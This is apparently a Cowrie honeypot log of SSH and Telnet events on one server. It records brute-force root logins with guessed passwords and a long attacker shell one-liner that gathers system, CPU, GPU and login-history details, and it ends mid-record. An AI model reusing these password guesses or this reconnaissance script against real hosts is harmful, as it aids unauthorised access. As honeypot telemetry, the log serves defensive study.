{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:56:09.121658Z","src_ip":"185.93.89.7","session":"c1588d65b1f2"}
{"eventid":"cowrie.login.success","username":"root","password":"index2025","message":"login attempt [root/index2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:56:09.159122Z","src_ip":"185.93.89.7","session":"c1588d65b1f2"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:09.178297Z","src_ip":"185.93.89.7","session":"c1588d65b1f2"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:10.435138Z","src_ip":"51.79.164.132","session":"1cc69420bfbb"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":60896,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9ab1d206758","protocol":"ssh","message":"New connection: 185.93.89.7:60896 (1.2.3.4:22) [session: f9ab1d206758]","sensor":"my-vps","timestamp":"2025-08-28T08:56:18.764122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:56:18.773028Z","src_ip":"185.93.89.7","session":"f9ab1d206758"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:56:18.809681Z","src_ip":"185.93.89.7","session":"f9ab1d206758"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2025","message":"login attempt [root/Index2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:56:18.905645Z","src_ip":"185.93.89.7","session":"f9ab1d206758"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:18.966426Z","src_ip":"185.93.89.7","session":"f9ab1d206758"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":59322,"dst_ip":"1.2.3.4","dst_port":22,"session":"4db5df631cb2","protocol":"ssh","message":"New connection: 51.79.164.132:59322 (1.2.3.4:22) [session: 4db5df631cb2]","sensor":"my-vps","timestamp":"2025-08-28T08:56:32.788840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:56:32.924364Z","src_ip":"51.79.164.132","session":"4db5df631cb2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:56:33.515308Z","src_ip":"51.79.164.132","session":"4db5df631cb2"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:56:34.746766Z","src_ip":"51.79.164.132","session":"4db5df631cb2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:56:35.688249Z","src_ip":"51.79.164.132","session":"4db5df631cb2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:56:35.688961Z","src_ip":"51.79.164.132","session":"4db5df631cb2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:36.336442Z","src_ip":"51.79.164.132","session":"4db5df631cb2"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:36.337578Z","src_ip":"51.79.164.132","session":"4db5df631cb2"}
{"eventid":"cowrie.session.connect","src_ip":"31.214.172.54","src_port":58744,"dst_ip":"1.2.3.4","dst_port":22,"session":"370347eaddae","protocol":"ssh","message":"New connection: 31.214.172.54:58744 (1.2.3.4:22) [session: 370347eaddae]","sensor":"my-vps","timestamp":"2025-08-28T08:56:39.462255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:56:39.582405Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T08:56:39.583125Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.login.success","username":"root","password":"1234@admin","message":"login attempt [root/1234@admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:56:40.377563Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46986,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b0718b2ae49","protocol":"telnet","message":"New connection: 212.227.235.229:46986 (1.2.3.4:23) [session: 3b0718b2ae49]","sensor":"my-vps","timestamp":"2025-08-28T08:56:44.834330Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:56:45.024983Z","src_ip":"212.227.235.229","session":"3b0718b2ae49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:56:45.040877Z","src_ip":"212.227.235.229","session":"3b0718b2ae49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35826,"dst_ip":"1.2.3.4","dst_port":22,"session":"95ccbfea8101","protocol":"ssh","message":"New connection: 212.227.125.160:35826 (1.2.3.4:22) [session: 95ccbfea8101]","sensor":"my-vps","timestamp":"2025-08-28T08:56:49.474247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:56:51.316612Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:56:51.317711Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":32806,"dst_ip":"1.2.3.4","dst_port":22,"session":"2769212b7428","protocol":"ssh","message":"New connection: 185.93.89.7:32806 (1.2.3.4:22) [session: 2769212b7428]","sensor":"my-vps","timestamp":"2025-08-28T08:56:54.968102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:56:54.971360Z","src_ip":"185.93.89.7","session":"2769212b7428"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:56:54.988302Z","src_ip":"185.93.89.7","session":"2769212b7428"}
{"eventid":"cowrie.login.success","username":"root","password":"index2025!","message":"login attempt [root/index2025!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:56:55.041599Z","src_ip":"185.93.89.7","session":"2769212b7428"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:55.061240Z","src_ip":"185.93.89.7","session":"2769212b7428"}
{"eventid":"cowrie.login.success","username":"root","password":"pass123","message":"login attempt [root/pass123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:56:56.774479Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63548,"dst_ip":"1.2.3.4","dst_port":22,"session":"61caf46a1809","protocol":"ssh","message":"New connection: 217.72.205.35:63548 (1.2.3.4:22) [session: 61caf46a1809]","sensor":"my-vps","timestamp":"2025-08-28T08:56:56.926494Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:56.927652Z","src_ip":"217.72.205.35","session":"61caf46a1809"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45006,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f3c29e451ba","protocol":"ssh","message":"New connection: 51.79.164.132:45006 (1.2.3.4:22) [session: 4f3c29e451ba]","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.640783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.764142Z","src_ip":"51.79.164.132","session":"4f3c29e451ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:56:58.990634Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.991531Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.992576Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.993700Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.994835Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.995932Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.996678Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.997741Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.998331Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.999003Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:56:58.999675Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:56:59.000334Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:56:59.000855Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-